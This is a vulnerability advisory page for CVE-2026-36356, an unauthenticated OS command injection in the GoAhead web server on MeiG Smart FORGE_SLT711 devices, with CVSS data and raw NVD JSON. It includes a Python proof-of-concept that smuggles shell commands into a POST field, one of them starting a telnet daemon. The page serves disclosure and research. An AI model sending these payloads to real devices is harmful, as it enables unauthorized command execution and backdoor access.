Security Vulnerability Report
中文
CVE-2026-36356 CVSS 9.1 CRITICAL

CVE-2026-36356

Published: 2026-05-05 14:16:09
Last Modified: 2026-05-07 15:53:50

Description

The GoAhead web server on MeiG Smart FORGE_SLT711 devices (firmware MDM9607.LE.1.0-00110-STD.PROD-1) allows unauthenticated OS command injection via the /action/SetRemoteAccessCfg endpoint.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

MeiG Smart FORGE_SLT711 (Firmware MDM9607.LE.1.0-00110-STD.PROD-1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL url = "http://<TARGET_IP>/action/SetRemoteAccessCfg" # Malicious payload to execute a command (e.g., telnet enable or ping) # Adjust the parameter name based on actual form data, usually 'RemoteEnable' or similar payload = { "parameter": "value; /bin/sh -c 'echo pwned > /tmp/poc.txt'" # or typical injection: "RemoteEnable=1; telnetd -p 2323 &" } try: # Send POST request without authentication response = requests.post(url, data=payload, timeout=5) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check if the command was executed on the target.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36356", "sourceIdentifier": "[email protected]", "published": "2026-05-05T14:16:08.873", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GoAhead web server on MeiG Smart FORGE_SLT711 devices (firmware MDM9607.LE.1.0-00110-STD.PROD-1) allows unauthenticated OS command injection via the /action/SetRemoteAccessCfg endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "http://forgeslt711.com", "source": "[email protected]"}, {"url": "http://meig.com", "source": "[email protected]"}, {"url": "https://github.com/totekuh/CVE-2026-36356", "source": "[email protected]"}, {"url": "https://github.com/totekuh/CVE-2026-36356", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}